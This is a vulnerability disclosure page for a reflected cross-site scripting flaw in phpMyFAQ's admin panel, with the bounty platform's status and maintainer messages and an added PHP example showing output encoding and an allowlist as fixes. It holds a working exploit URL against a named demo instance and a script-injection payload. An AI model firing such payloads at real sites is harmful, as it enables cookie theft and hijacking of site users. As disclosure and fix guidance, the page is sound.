Reflected Cross-Site Scripting in thorsten/phpmyfaq
Valid
Reported on Nov 26th 2022
Description
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
Proof of Concept
Go to your phpMyFAQ web instance and visit the URL below.
Exploit URL: https://roy.demo.phpmyfaq.de/admin/index.php?action=SEX%22%3E%3CScRiPt%3Ealert(133333337)%3C/ScRiPt%3E
Payload used: "><ScRiPt>alert(9699)</ScRiPt>
#YO Maintainer :) Long Time No SEE !
Impact
An attacker can execute JavaScript; anyone can steal the cookie, redirect to any URL, and lots of other FUN.
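An added example, not part of the original report and not phpMyFAQ's code: it shows how the reported payload breaks out of a double-quoted attribute when a query parameter is echoed unencoded, next to two mitigations. The hidden-field sink, the function names and the `ALLOWED_ACTIONS` list are assumptions; the page does not show where `action` is reflected.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist of admin actions (assumption, not the project's list).
const ALLOWED_ACTIONS = ['dashboard', 'config', 'user'];
const DEFAULT_ACTION = 'dashboard';

// Vulnerable pattern: the raw query value lands inside a double-quoted
// attribute, so a leading `">` closes the attribute and the tag.
function renderVulnerable(string $action): string
{
    return '<input type="hidden" name="action" value="' . $action . '">';
}

// A case-sensitive blocklist does not help: the payload spells the tag
// "ScRiPt", and HTML tag names are case-insensitive.
function naiveFilter(string $action): string
{
    return str_replace(['<script>', '</script>'], '', $action);
}

// Mitigation 1: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
function renderEncoded(string $action): string
{
    $safe = htmlspecialchars($action, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="action" value="' . $safe . '">';
}

// Mitigation 2: only accept known action names, fall back to a default.
function resolveAction(string $action): string
{
    return in_array($action, ALLOWED_ACTIONS, true) ? $action : DEFAULT_ACTION;
}

// Constructed input: the URL-decoded value of `action` from the report.
$action = '"><ScRiPt>alert(9699)</ScRiPt>';

echo "raw:       ", renderVulnerable($action), PHP_EOL;
echo "blocklist: ", renderVulnerable(naiveFilter($action)), PHP_EOL;
echo "encoded:   ", renderEncoded($action), PHP_EOL;
echo "allowlist: ", renderEncoded(resolveAction($action)), PHP_EOL;
```

The first two lines of output still contain a live `<ScRiPt>` element; the last two do not, and combining the allowlist with output encoding covers any other place the value might be echoed.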
We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours.
The researcher's credibility has increased: +7
Thorsten Rinne has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Dec 31st 2022
Hi @maintainer, can I have a CVE for this valid report :), allow @admin to do it.
As you can see above, a CVE has been assigned and will be published on Dec 31st :))
Thanks, v3.1.9 is now released!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1